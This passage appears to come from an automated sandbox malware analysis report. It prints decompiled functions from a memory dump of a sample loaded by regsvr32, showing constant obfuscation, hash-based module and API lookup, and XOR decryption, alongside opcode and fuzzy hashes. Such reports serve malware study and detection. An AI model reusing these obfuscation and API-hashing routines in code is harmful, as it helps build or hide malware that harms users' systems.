				char _v552;
				signed int _v556;
				intOrPtr _v560;
				signed int _v564;
				signed int _v568;
				signed int _v572;
				signed int _v576;
				signed int _v580;
				signed int _v584;
				signed int _v588;
				signed int _v592;
				signed int _v596;
				signed int _v600;
				void* _t99;
				void* _t109;
				void* _t112;
				signed int _t126;
				signed int _t127;
				signed int* _t131;

				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E040EFE29(_t99);
				_v556 = _v556 & 0x00000000;
				_t131 =  &(( &_v600)[4]);
				_v560 = 0x11afe4;
				_v572 = 0x705fac;
				_v572 = _v572 >> 3;
				_t112 = 0x5dfd87c;
				_v572 = _v572 ^ 0x000e0be5;
				_v600 = 0x66ffbc;
				_v600 = _v600 << 5;
				_v600 = _v600 + 0xffffdeb6;
				_v600 = _v600 >> 3;
				_v600 = _v600 ^ 0x019de099;
				_v564 = 0xb3cc88;
				_v564 = _v564 >> 0xc;
				_v564 = _v564 ^ 0x000695d5;
				_v576 = 0xedaac2;
				_v576 = _v576 | 0x8d88b270;
				_t126 = 0xa;
				_v576 = _v576 / _t126;
				_v576 = _v576 ^ 0x0e34170c;
				_v568 = 0xd34644;
				_v568 = _v568 << 0xd;
				_v568 = _v568 ^ 0x68c9882a;
				_v596 = 0xa76cec;
				_v596 = _v596 + 0xf564;
				_v596 = _v596 | 0x7a23d379;
				_t127 = 0x75;
				_v596 = _v596 / _t127;
				_v596 = _v596 ^ 0x010c78ac;
				_v588 = 0xf6d5ff;
				_v588 = _v588 ^ 0x1e4d5d29;
				_v588 = _v588 | 0xf865f4c1;
				_v588 = _v588 ^ 0xfef0a2a0;
				_v592 = 0xc86264;
				_v592 = _v592 + 0xffff9c97;
				_v592 = _v592 << 0xb;
				_v592 = _v592 + 0x20dd;
				_v592 = _v592 ^ 0x3ff909a0;
				_v584 = 0x196fa2;
				_v584 = _v584 >> 3;
				_v584 = _v584 | 0xe537cc6c;
				_v584 = _v584 ^ 0xe53246df;
				_v580 = 0xb6108b;
				_v580 = _v580 + 0xfdd;
				_v580 = _v580 << 3;
				_v580 = _v580 ^ 0x05ba306f;
				do {
					while(_t112 != 0x5b30f91) {
						if(_t112 == 0x5dfd87c) {
							_t109 = E040EFE2A(_v600, _v564, _v572,  &_v552);
							_t112 = 0xb74f612;
							continue;
						} else {
							if(_t112 == 0xb74f612) {
								_t109 = E040D2F80( &_v520, _v576, _v568, _v596);
								_t131 =  &(_t131[3]);
								_t112 = 0x5b30f91;
								continue;
							}
						}
						goto L7;
					}
					E040E06FE(_v588, _v592, _a8,  &_v520, _v584, _t112,  &_v552, _v580);
					_t131 =  &(_t131[6]);
					_t112 = 0xf20a46f;
					L7:
				} while (_t112 != 0xf20a46f);
				return _t109;
			}

0x040d1cab
0x040d1cb2
0x040d1cb9
0x040d1cba
0x040d1cbb
0x040d1cc0
0x040d1cc5
0x040d1cc8
0x040d1cd2
0x040d1cdf
0x040d1ce4
0x040d1ce6
0x040d1cf3
0x040d1d00
0x040d1d05
0x040d1d0d
0x040d1d12
0x040d1d1a
0x040d1d22
0x040d1d27
0x040d1d2f
0x040d1d37
0x040d1d45
0x040d1d4a
0x040d1d50
0x040d1d58
0x040d1d60
0x040d1d65
0x040d1d6d
0x040d1d75
0x040d1d7d
0x040d1d89
0x040d1d91
0x040d1d95
0x040d1d9d
0x040d1da5
0x040d1dad
0x040d1db5
0x040d1dbd
0x040d1dc5
0x040d1dcd
0x040d1dd2
0x040d1dda
0x040d1de2
0x040d1dea
0x040d1def
0x040d1df7
0x040d1dff
0x040d1e07
0x040d1e0f
0x040d1e14
0x040d1e1c
0x040d1e1c
0x040d1e22
0x040d1e55
0x040d1e5c
0x00000000
0x040d1e24
0x040d1e26
0x040d1e38
0x040d1e3d
0x040d1e40
0x00000000
0x040d1e40
0x040d1e26
0x00000000
0x040d1e22
0x040d1e82
0x040d1e87
0x040d1e8a
0x040d1e8c
0x040d1e8c
0x040d1e9a

Memory Dump Source

Source File: 00000003.00000002.247650152.00000000040D1000.00000020.00000001.sdmp, Offset: 040D0000, based on PE: true

Associated: 00000003.00000002.247645014.00000000040D0000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.247693534.00000000040F6000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_40d0000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 093d82f95d62312768d893bf8c84c3e2e2046d03e20daec24e1e81ca69d6cf6d
Instruction ID: dffa7c179c5f9691b642ce67df13332f82f9b74f042fa0f86b603a1deb28d601
Opcode Fuzzy Hash: 093d82f95d62312768d893bf8c84c3e2e2046d03e20daec24e1e81ca69d6cf6d
Instruction Fuzzy Hash: 555150B21093029FC754DF21D88946FBBE1FBD4748F004A2CF19A66221DBB59A4D8F87

Uniqueness

Uniqueness Score: -1.00%

Function 040EFF58, Relevance: .1, Instructions: 97
COMMONCrypto

Download Yara Rule

C-Code - Quality: 93%

			E040EFF58(signed int __edx) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				intOrPtr _t121;
				signed int* _t123;
				intOrPtr _t125;
				signed int _t137;
				signed int _t138;
				signed int _t139;
				signed int _t140;

				_v24 = 0xfb956e;
				_v24 = _v24 ^ 0xccd4b1e5;
				_v24 = _v24 << 2;
				_v24 = _v24 ^ 0x30bd930f;
				_v44 = 0xac147c;
				_t137 = __edx;
				_v44 = _v44 * 0x49;
				_v44 = _v44 ^ 0x31196cd2;
				_v8 = 0x40a8d3;
				_v8 = _v8 | 0x3acc4d3b;
				_v8 = _v8 << 3;
				_v8 = _v8 >> 2;
				_v8 = _v8 ^ 0x3596af33;
				_v40 = 0x7a1af9;
				_v40 = _v40 | 0x9e6699ed;
				_v40 = _v40 ^ 0x9e79921f;
				_v28 = 0x2e80d;
				_v28 = _v28 | 0x96bed856;
				_v28 = _v28 + 0x6398;
				_v28 = _v28 ^ 0x96be47ad;
				_v16 = 0x1a939;
				_v16 = _v16 >> 0xb;
				_v16 = _v16 + 0xffff851f;
				_v16 = _v16 >> 0xc;
				_v16 = _v16 ^ 0x0002802d;
				_v12 = 0x8a82de;
				_v12 = _v12 + 0xffff96d2;
				_v12 = _v12 << 0xd;
				_t138 = 0x7d;
				_v12 = _v12 / _t138;
				_v12 = _v12 ^ 0x00892f26;
				_v48 = 0xf49a5c;
				_v48 = _v48 + 0x7176;
				_v48 = _v48 ^ 0x00fa98c0;
				_v52 = 0x2df28f;
				_t139 = 0x75;
				_v52 = _v52 / _t139;
				_v52 = _v52 ^ 0x0004ae50;
				_v36 = 0xfa4daf;
				_v36 = _v36 << 0xc;
				_t140 = 0x6f;
				_v36 = _v36 * 0x11;
				_v36 = _v36 ^ 0xf2876c8f;
				_v32 = 0x3a5591;
				_v32 = _v32 >> 4;
				_v32 = _v32 >> 0xa;
				_v32 = _v32 ^ 0x00085aff;
				_v20 = 0x5fc7f5;
				_v20 = _v20 / _t140;
				_v20 = _v20 << 0xc;
				_v20 = _v20 >> 9;
				_v20 = _v20 ^ 0x000581a9;
				_push(_v40);
				_push(_v8);
				_push(_v44);
				_t121 = E040D52B9(E040EE1F8(_t123, _v24, _v20), _v28, _v16, _v12, _v48);
				_t125 =  *0x40f620c; // 0x0
				 *((intOrPtr*)(_t125 + 0x14 + _t137 * 4)) = _t121;
				return E040EFECB(_t120, _v52, _v36, _v32, _v20);
			}

0x040eff5e
0x040eff65
0x040eff6c
0x040eff70
0x040eff77
0x040eff86
0x040eff8a
0x040eff8d
0x040eff94
0x040eff9b
0x040effa2
0x040effa6
0x040effaa
0x040effb1
0x040effb8
0x040effbf
0x040effc6
0x040effcd
0x040effd4
0x040effdb
0x040effe2
0x040effe9
0x040effed
0x040efff4
0x040efff8
0x040effff
0x040f0006
0x040f000d
0x040f0014
0x040f0019
0x040f001e
0x040f0025
0x040f002c
0x040f0033
0x040f003a
0x040f0044
0x040f0049
0x040f004e
0x040f0055
0x040f005c
0x040f0064
0x040f0065
0x040f0068
0x040f006f
0x040f0076
0x040f007a
0x040f007e
0x040f0085
0x040f0091
0x040f0094
0x040f0098
0x040f009c
0x040f00a3
0x040f00a6
0x040f00a9
0x040f00c4
0x040f00c9
0x040f00d2
0x040f00ee

Memory Dump Source

Source File: 00000003.00000002.247650152.00000000040D1000.00000020.00000001.sdmp, Offset: 040D0000, based on PE: true

Associated: 00000003.00000002.247645014.00000000040D0000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.247693534.00000000040F6000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_40d0000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 13e1e29d341335d6501d673bbcb123f28a03390770ee4f484d8de7787442a437
Instruction ID: 2d39a258da1d38836196c429f5a30c82326c6f658b24f91190cacf7e5342607e
Opcode Fuzzy Hash: 13e1e29d341335d6501d673bbcb123f28a03390770ee4f484d8de7787442a437
Instruction Fuzzy Hash: 8D41EE71D0122DEBCF04DFA5D94A4EEBFB2FB48318F108199D521B6220D3B91A59DF94

Uniqueness

Uniqueness Score: -1.00%

Function 040E4244, Relevance: .1, Instructions: 91
COMMONCrypto

Download Yara Rule

C-Code - Quality: 92%

			E040E4244(void* __ecx, void* __edx, void* __eflags) {
				signed int* _t49;
				signed int _t51;
				unsigned int* _t65;
				signed int _t66;
				signed int _t68;
				signed int _t72;
				unsigned int _t73;
				unsigned int _t74;
				unsigned int* _t77;
				signed int* _t78;
				signed int* _t79;
				unsigned int _t81;
				void* _t87;
				void* _t89;
				void* _t91;
				void* _t93;

				_push( *(_t91 + 0x2c));
				_push( *(_t91 + 0x2c));
				_push( *((intOrPtr*)(_t91 + 0x18)));
				_t49 = E040EFE29( *((intOrPtr*)(_t91 + 0x18)));
				 *(_t91 + 0x28) = 0x3d5cbc;
				_t5 =  &(_t49[1]); // 0x4
				_t78 = _t5;
				 *(_t91 + 0x28) =  *(_t91 + 0x28) | 0x6bd7da0a;
				 *(_t91 + 0x28) =  *(_t91 + 0x28) ^ 0x6bf86309;
				 *(_t91 + 0x38) = 0xea1d3d;
				 *(_t91 + 0x38) =  *(_t91 + 0x38) | 0x10653bc0;
				 *(_t91 + 0x38) =  *(_t91 + 0x38) ^ 0x4ee4a363;
				 *(_t91 + 0x38) =  *(_t91 + 0x38) | 0xb4800a62;
				 *(_t91 + 0x38) =  *(_t91 + 0x38) ^ 0xfe847125;
				 *(_t91 + 0x24) = 0x45f786;
				 *(_t91 + 0x24) =  *(_t91 + 0x24) | 0x34f761f8;
				 *(_t91 + 0x24) =  *(_t91 + 0x24) ^ 0x34f5c6b3;
				 *(_t91 + 0x20) = 0xc15f52;
				 *(_t91 + 0x20) =  *(_t91 + 0x20) ^ 0x92036f91;
				 *(_t91 + 0x20) =  *(_t91 + 0x20) ^ 0x92c36404;
				_t68 =  *_t49;
				_t79 =  &(_t78[1]);
				_t51 =  *_t78 ^ _t68;
				 *(_t91 + 0x2c) = _t68;
				 *(_t91 + 0x30) = _t51;
				_t31 = _t51 + 1; // 0x1
				_t81 =  !=  ? (_t31 & 0xfffffffc) + 4 : _t31;
				_t65 = E040DC5D8(_t81);
				_t93 = _t91 + 0x18;
				 *(_t93 + 0x24) = _t65;
				if(_t65 != 0) {
					_t89 = 0;
					_t77 = _t65;
					_t87 =  >  ? 0 :  &(_t79[_t81 >> 2]) - _t79 + 3 >> 2;
					if(_t87 != 0) {
						_t66 =  *(_t93 + 0x1c);
						do {
							_t72 =  *_t79;
							_t79 =  &(_t79[1]);
							_t73 = _t72 ^ _t66;
							 *_t77 = _t73;
							_t77 =  &(_t77[1]);
							_t74 = _t73 >> 0x10;
							 *((char*)(_t77 - 3)) = _t73 >> 8;
							 *(_t77 - 2) = _t74;
							_t89 = _t89 + 1;
							 *((char*)(_t77 - 1)) = _t74 >> 8;
						} while (_t89 < _t87);
						_t65 =  *(_t93 + 0x28);
					}
					 *((char*)(_t65 +  *((intOrPtr*)(_t93 + 0x20)))) = 0;
				}
				return _t65;
			}

0x040e424e
0x040e4252
0x040e4256
0x040e4259
0x040e425e
0x040e4266
0x040e4266
0x040e4269
0x040e4271
0x040e4279
0x040e4281
0x040e4289
0x040e4291
0x040e4299
0x040e42a1
0x040e42a9
0x040e42b1
0x040e42b9
0x040e42c1
0x040e42c9
0x040e42d1
0x040e42d5
0x040e42d8
0x040e42da
0x040e42de
0x040e42e2
0x040e42f2
0x040e430e
0x040e4310
0x040e4313
0x040e4319
0x040e4321
0x040e4323
0x040e4334
0x040e4339
0x040e433b
0x040e433f
0x040e433f
0x040e4341
0x040e4344
0x040e4346
0x040e434d
0x040e4350
0x040e4353
0x040e4356
0x040e435c
0x040e435d
0x040e4360
0x040e4364
0x040e4364
0x040e436d
0x040e436d
0x040e4379

Memory Dump Source

Source File: 00000003.00000002.247650152.00000000040D1000.00000020.00000001.sdmp, Offset: 040D0000, based on PE: true

Associated: 00000003.00000002.247645014.00000000040D0000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.247693534.00000000040F6000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_40d0000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 37e89cb84dd8fa63864b63d4cf921de512c7c968c9f482bdb6f048739d92c7a5
Instruction ID: 57440646da3ce0b520f43ec937e848124d2d87539c8003fc27e00ade1d767265
Opcode Fuzzy Hash: 37e89cb84dd8fa63864b63d4cf921de512c7c968c9f482bdb6f048739d92c7a5
Instruction Fuzzy Hash: 453189726083419FC305CF29C48185BFBE0FB88718F454B6DF88AA7221D774EA09CB96

Uniqueness

Uniqueness Score: -1.00%

Function 040E3D85, Relevance: .1, Instructions: 86
COMMONCrypto

Download Yara Rule

C-Code - Quality: 91%

			E040E3D85(void* __ecx, signed int* __edx, void* __eflags, signed int* _a4, intOrPtr _a8) {
				signed int _v4;
				signed int _v8;
				unsigned int _v12;
				unsigned int _v16;
				signed int _v20;
				signed int _v24;
				void* _t46;
				signed int _t49;
				signed int* _t63;
				void* _t69;
				signed int _t72;
				void* _t77;
				unsigned int _t79;
				void* _t81;
				signed int* _t82;
				signed int* _t83;
				void* _t84;

				_t63 = _a4;
				_push(_a8);
				_push(_t63);
				_push(__edx);
				E040EFE29(_t46);
				_v12 = 0xc30617;
				_t82 =  &(__edx[1]);
				_v12 = _v12 >> 8;
				_v12 = _v12 ^ 0x0000aeb3;
				_v20 = 0xf93b19;
				_v20 = _v20 * 0x55;
				_v20 = _v20 ^ 0x85e9037f;
				_v20 = _v20 + 0xffff2dcc;
				_v20 = _v20 ^ 0xd720e096;
				_v16 = 0x37fa8e;
				_v16 = _v16 ^ 0xc309fd15;
				_v16 = _v16 >> 7;
				_v16 = _v16 ^ 0x018ad68f;
				_v24 = 0x2aa640;
				_v24 = _v24 | 0xaf302e4c;
				_v24 = _v24 << 2;
				_v24 = _v24 | 0xa0025b53;
				_v24 = _v24 ^ 0xbce807cd;
				_t49 =  *__edx;
				_t83 =  &(_t82[1]);
				_t72 =  *_t82 ^ _t49;
				_v8 = _t49;
				_v4 = _t72;
				_t79 =  !=  ? (_t72 & 0xfffffffc) + 4 : _t72;
				_t84 = E040DC5D8(_t79);
				if(_t84 == 0) {
					L6:
					return _t84;
				}
				_t81 = 0;
				_t77 =  >  ? 0 :  &(_t83[_t79 >> 2]) - _t83 + 3 >> 2;
				if(_t77 == 0) {
					L4:
					if(_t63 != 0) {
						 *_t63 = _v4;
					}
					goto L6;
				}
				_t69 = _t84 - _t83;
				do {
					_t81 = _t81 + 1;
					 *(_t69 + _t83) =  *_t83 ^ _v8;
					_t83 =  &(_t83[1]);
				} while (_t81 < _t77);
				goto L4;
			}

0x040e3d89
0x040e3d90
0x040e3d94
0x040e3d95
0x040e3d97
0x040e3d9c
0x040e3da4
0x040e3da7
0x040e3dac
0x040e3db4
0x040e3dc1
0x040e3dc5
0x040e3dcd
0x040e3dd5
0x040e3ddd
0x040e3de5
0x040e3ded
0x040e3df2
0x040e3dfa
0x040e3e02
0x040e3e0a
0x040e3e0f
0x040e3e17
0x040e3e1f
0x040e3e23
0x040e3e26
0x040e3e28
0x040e3e2e
0x040e3e3f
0x040e3e5b
0x040e3e62
0x040e3ea2
0x040e3ea9
0x040e3ea9
0x040e3e6c
0x040e3e7a
0x040e3e7f
0x040e3e96
0x040e3e98
0x040e3e9e
0x040e3e9e
0x00000000
0x040e3e98
0x040e3e83
0x040e3e85
0x040e3e8b
0x040e3e8c
0x040e3e8f
0x040e3e92
0x00000000

Memory Dump Source

Source File: 00000003.00000002.247650152.00000000040D1000.00000020.00000001.sdmp, Offset: 040D0000, based on PE: true

Associated: 00000003.00000002.247645014.00000000040D0000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.247693534.00000000040F6000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_40d0000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 69d5b5b74808eb49daa8270ee7dfe51a587ad052fe83dd9d48b36d2eab0a3116
Instruction ID: df58904984c684569ae1fda4efa34694a21fd8c54afc33021f05902b138377d2
Opcode Fuzzy Hash: 69d5b5b74808eb49daa8270ee7dfe51a587ad052fe83dd9d48b36d2eab0a3116
Instruction Fuzzy Hash: 3B319A726083008FD358DF2AC98551BBBE6FBC871CF044B6DF889A3214DB74EA058B46

Uniqueness

Uniqueness Score: -1.00%

Function 040E567B, Relevance: .1, Instructions: 70
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E040E567B(void* __edx) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _t66;
				void* _t70;
				signed int _t71;
				signed int _t72;
				intOrPtr* _t81;
				intOrPtr* _t82;
				void* _t83;

				_v16 = 0x3cd044;
				_v16 = _v16 + 0x8a1e;
				_t70 = __edx;
				_t71 = 0x23;
				_v16 = _v16 / _t71;
				_v16 = _v16 ^ 0x000ceb59;
				_v20 = 0x98fec3;
				_v20 = _v20 + 0x117b;
				_v20 = _v20 ^ 0x00928bce;
				_v12 = 0xc66557;
				_v12 = _v12 | 0xbd5cb058;
				_t72 = 0x6a;
				_v12 = _v12 / _t72;
				_v12 = _v12 * 0x5e;
				_v12 = _v12 ^ 0xa86b283b;
				_v8 = 0xf205aa;
				_v8 = _v8 ^ 0x840ccd49;
				_v8 = _v8 + 0x2990;
				_v8 = _v8 >> 0xc;
				_v8 = _v8 ^ 0x0003f43b;
				_v28 = 0xeebda;
				_v28 = _v28 + 0xdccc;
				_v28 = _v28 ^ 0x00000347;
				_v24 = 0xa36d5e;
				_v24 = _v24 | 0xd0b00948;
				_v24 = _v24 ^ 0xd0bd6ebb;
				_t81 =  *((intOrPtr*)(E040DF7F7() + 0xc)) + 0xc;
				_t82 =  *_t81;
				while(_t82 != _t81) {
					_t66 = E040DEFE1(_v8, _v28, _v24,  *((intOrPtr*)(_t82 + 0x30)));
					_t83 = _t83 + 0xc;
					if((_t66 ^ 0x2d567c83) == _t70) {
						return  *((intOrPtr*)(_t82 + 0x18));
					}
					_t82 =  *_t82;
				}
				return 0;
			}

0x040e5681
0x040e5688
0x040e5695
0x040e569b
0x040e56a0
0x040e56a5
0x040e56ac
0x040e56b3
0x040e56ba
0x040e56c1
0x040e56c8
0x040e56d2
0x040e56d5
0x040e56dc
0x040e56df
0x040e56e6
0x040e56ed
0x040e56f4
0x040e56fb
0x040e56ff
0x040e5706
0x040e570d
0x040e5714
0x040e571b
0x040e5722
0x040e5729
0x040e573e
0x040e5741
0x040e5767
0x040e5754
0x040e575e
0x040e5763
0x00000000
0x040e5774
0x040e5765
0x040e5765
0x00000000

Memory Dump Source

Source File: 00000003.00000002.247650152.00000000040D1000.00000020.00000001.sdmp, Offset: 040D0000, based on PE: true

Associated: 00000003.00000002.247645014.00000000040D0000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.247693534.00000000040F6000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_40d0000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f55cd74c2952393ab5aca3dee7201afe3819bdbfddab02328eb5f9b09f94cb42
Instruction ID: 06f4ea978f8db5f23f1cb0cb09b2b5e9a24b2a263d4bc17005eb49f8ddcf3e19
Opcode Fuzzy Hash: f55cd74c2952393ab5aca3dee7201afe3819bdbfddab02328eb5f9b09f94cb42
Instruction Fuzzy Hash: 3A314772E00209EFDB58DFE5D88A8AEFBB1FB40318F208099D515BB210D3B46B559F81

Uniqueness

Uniqueness Score: -1.00%

Function 040DF0E9, Relevance: .1, Instructions: 70
COMMONCrypto

Download Yara Rule

C-Code - Quality: 85%

			E040DF0E9(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				void* _t69;
				signed int _t83;
				signed int _t84;
				signed int _t85;
				signed int _t86;
				signed int _t87;

				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E040EFE29(_t69);
				_v8 = 0x819b57;
				_v8 = _v8 >> 0x10;
				_t83 = 0x17;
				_v8 = _v8 / _t83;
				_v8 = _v8 >> 0xf;
				_v8 = _v8 ^ 0x00008000;
				_v24 = 0x7d8883;
				_v24 = _v24 >> 0xd;
				_v24 = _v24 + 0xffff5cfc;
				_v24 = _v24 ^ 0xfff105d0;
				_v16 = 0x4e701e;
				_v16 = _v16 ^ 0xb2bd4297;
				_t84 = 0x5b;
				_v16 = _v16 / _t84;
				_t85 = 0x7f;
				_v16 = _v16 / _t85;
				_v16 = _v16 ^ 0x000cfa43;
				_v12 = 0xc80371;
				_t86 = 0x37;
				_v12 = _v12 / _t86;
				_v12 = _v12 >> 1;
				_t87 = 0x79;
				_v12 = _v12 / _t87;
				_v12 = _v12 ^ 0x0004b486;
				_v20 = 0xa43314;
				_v20 = _v20 << 3;
				_v20 = _v20 + 0xa205;
				_v20 = _v20 ^ 0x052abea0;
				return E040DF8A9(_v24, _v16, __edx, _v12, _v8, _v20);
			}

0x040df0f0
0x040df0f5
0x040df0f8
0x040df0f9
0x040df0fa
0x040df0ff
0x040df108
0x040df111
0x040df116
0x040df11b
0x040df11f
0x040df126
0x040df12d
0x040df131
0x040df138
0x040df13f
0x040df146
0x040df150
0x040df155
0x040df15d
0x040df162
0x040df167
0x040df16e
0x040df178
0x040df17d
0x040df182
0x040df188
0x040df18b
0x040df18e
0x040df195
0x040df19c
0x040df1a0
0x040df1a7
0x040df1ca

Memory Dump Source

Source File: 00000003.00000002.247650152.00000000040D1000.00000020.00000001.sdmp, Offset: 040D0000, based on PE: true

Associated: 00000003.00000002.247645014.00000000040D0000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.247693534.00000000040F6000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_40d0000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f7bc40e7220c11a054e5cb1e3d04733d7eea9a3290a44af2851a921ba079d4ed
Instruction ID: 1741db4e0cdd7a4de83ae419062b578deb4e7f6147ff0584b3972eb51dd03e63
Opcode Fuzzy Hash: f7bc40e7220c11a054e5cb1e3d04733d7eea9a3290a44af2851a921ba079d4ed
Instruction Fuzzy Hash: 6D210476E00209EBDF08CFE5C9099EEBBB2EB54314F20C09AE515AB290D7B55B54DF81

Uniqueness

Uniqueness Score: -1.00%

Function 040E0EBC, Relevance: .1, Instructions: 58
COMMONCrypto

Download Yara Rule

C-Code - Quality: 58%

			E040E0EBC(signed int __ecx, void* __edx, intOrPtr _a4, intOrPtr _a12, intOrPtr _a16, intOrPtr _a28, intOrPtr _a32) {
				unsigned int _v8;
				signed int _v12;
				signed int _v16;
				unsigned int _v20;
				void* _t44;
				intOrPtr* _t51;

				E040EFE29(_t44);
				_v20 = 0x5f9276;
				_v20 = _v20 >> 6;
				_v20 = _v20 >> 0xa;
				_v20 = _v20 ^ 0x0000ae6f;
				_v16 = 0x7df0fb;
				_v16 = _v16 >> 0xb;
				_v16 = _v16 ^ 0x9952d77b;
				_v16 = _v16 ^ 0x9951c792;
				_v12 = 0xf93209;
				_v12 = _v12 | 0xf37a8f1a;
				_v12 = _v12 + 0xffff09ac;
				_v12 = _v12 + 0xa761;
				_v12 = _v12 ^ 0xf3f42664;
				_v8 = 0x4c6886;
				_v8 = _v8 ^ 0x2aaf40fd;
				_v8 = _v8 * 0x7c;
				_v8 = _v8 >> 5;
				_v8 = _v8 ^ 0x0632021c;
				_t51 = E040DEB52(__ecx, __ecx, 0xc0c22a7, 0x4d, 0xa2289af1);
				return  *_t51(0, 0, _a32, _a28, 0, 0, __ecx, 0, _a4, 0, _a12, _a16, 0, 0, _a28, _a32);
			}

0x040e0ed9
0x040e0ede
0x040e0ee8
0x040e0eec
0x040e0ef0
0x040e0ef7
0x040e0efe
0x040e0f02
0x040e0f09
0x040e0f10
0x040e0f17
0x040e0f1e
0x040e0f25
0x040e0f2c
0x040e0f33
0x040e0f3a
0x040e0f52
0x040e0f55
0x040e0f59
0x040e0f6d
0x040e0f85

Memory Dump Source

Source File: 00000003.00000002.247650152.00000000040D1000.00000020.00000001.sdmp, Offset: 040D0000, based on PE: true

Associated: 00000003.00000002.247645014.00000000040D0000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.247693534.00000000040F6000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_40d0000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 28b9a31d6d310fd66289eca8aff00d608e2121ecbf4137da26fc55f628ae5085
Instruction ID: e16837130060ef93781356dac826a571c2f08ed1f3169b8c8cad6293bd98e88c
Opcode Fuzzy Hash: 28b9a31d6d310fd66289eca8aff00d608e2121ecbf4137da26fc55f628ae5085
Instruction Fuzzy Hash: 0F211F71801219FBDF18DFA1CD4A8DFBFB4FF08358F108688E958A2220D3799A14DB91

Uniqueness

Uniqueness Score: -1.00%

Function 040DEF0C, Relevance: .1, Instructions: 56
COMMONCrypto

Download Yara Rule

C-Code - Quality: 95%

			E040DEF0C(void* __ecx, signed int __edx, void* __eflags) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				char _v28;
				signed int _v32;
				signed int _t57;
				signed int _t67;

				_v28 = 4;
				_v24 = 0xd6e1b5;
				_v24 = _v24 | 0x5e4e7cd1;
				_v24 = _v24 >> 0x10;
				_v24 = _v24 ^ 0x20005ede;
				_v12 = 0x35fbf9;
				_v12 = _v12 << 2;
				_v12 = _v12 + 0xffffd421;
				_v12 = _v12 >> 5;
				_v12 = _v12 ^ 0x000779ff;
				_v8 = 0xb66603;
				_v8 = _v8 | 0x4ba1ba6b;
				_v8 = _v8 ^ 0x6df4d1b9;
				_v8 = _v8 ^ 0x1286fe83;
				_v8 = _v8 ^ 0x34cd5dfe;
				_v20 = 0x1bb0b6;
				_v20 = _v20 | 0x21937f20;
				_v20 = _v20 << 4;
				_v20 = _v20 ^ 0x19bd1c5b;
				_v16 = 0xd95204;
				_v16 = _v16 ^ 0x6876e9a1;
				_t67 = 0x62;
				_v16 = _v16 / _t67;
				_v16 = _v16 ^ 0x01180520;
				_t57 = E040E60B8(_v12, _v24 | __edx, _v8,  &_v28,  &_v32, __ecx, __ecx, _v20, _v16);
				asm("sbb eax, eax");
				return  ~_t57 & _v32;
			}

0x040def12
0x040def19
0x040def20
0x040def27
0x040def2b
0x040def32
0x040def39
0x040def3d
0x040def44
0x040def48
0x040def4f
0x040def56
0x040def5d
0x040def64
0x040def6b
0x040def72
0x040def79
0x040def80
0x040def84
0x040def8d
0x040def96
0x040defa4
0x040defa7
0x040defad
0x040defcc
0x040defd6
0x040defe0

Memory Dump Source

Source File: 00000003.00000002.247650152.00000000040D1000.00000020.00000001.sdmp, Offset: 040D0000, based on PE: true

Associated: 00000003.00000002.247645014.00000000040D0000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.247693534.00000000040F6000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_40d0000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0453756cfbe0a422653622112b7418f35eca55d4e05d609691c55542fdca0349
Instruction ID: 509fbc4cd94a67c26d2ab4639c9adb16df2564b102ff488b7c0efa4dfa9321ba
Opcode Fuzzy Hash: 0453756cfbe0a422653622112b7418f35eca55d4e05d609691c55542fdca0349
Instruction Fuzzy Hash: 9921E372C0120DABDB09DFE5CA4A5EFFBB5EB44204F608299D512B6220D3B55B059BA2

Uniqueness

Uniqueness Score: -1.00%

Function 040DC5D8, Relevance: .1, Instructions: 53
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E040DC5D8(signed int _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				intOrPtr _v36;
				signed int _t69;
				signed int _t70;

				_v32 = _v32 & 0x00000000;
				_v36 = 0xa0afa0;
				_v28 = 0x9adc8d;
				_v28 = _v28 ^ 0x90925320;
				_v28 = _v28 ^ 0x90088fa5;
				_v24 = 0x1cb3a6;
				_v24 = _v24 << 0x10;
				_v24 = _v24 ^ 0xb3a3d0bd;
